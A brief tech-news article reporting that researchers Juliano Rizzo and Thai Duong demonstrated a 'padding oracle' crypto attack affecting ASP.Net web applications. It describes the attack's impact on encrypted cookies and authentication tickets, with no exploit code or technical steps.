ASP.Net Web Apps Face Risk of 'Padding Oracle' Crypto Attack

Web apps built on ASP.Net may face a new wave of crypto attacks, putting sensitive data as -- well as Microsoft's already tarnished reputation for insecurity -- at risk. The so-called "padding oracle" attack affects every ASP.Net Web application, according to security researcher Juliano Rizzo, enabling an attacker to decrypt cookies' view states, passwords, user […]

Web apps built on ASP.Net may face a new wave of crypto attacks, putting sensitive data as -- well as Microsoft's already tarnished reputation for insecurity -- at risk. The so-called "padding oracle" attack affects every ASP.Net Web application, according to security researcher Juliano Rizzo, enabling an attacker to decrypt cookies' view states, passwords, user data (such as Social Security numbers), and anything else encrypted using framework's API. Beyond getting their hands on sensitive data, malicious hackers could use the exploit to forge authentication tickets and access applications with admin rights.

The attack takes advantage of ASP.Net's buggy implementation of AES (Advanced Encryption Standard).

Notably, ASP.Net isn't the only platform that can affected by these padding oracle attacks, which've been around since 2002. Rizzo and fellow researcher Thai Duong, the developers of the attacks, previously demonstrated weaknesses in JavaServer Faces, Ruby on Rails, and OWASP ESAPI. The fact it exploits ASP.Net platform, however, will likely boost awareness of the problem -- the Redmond giant is likely to bear the brunt of the criticism.

[Source]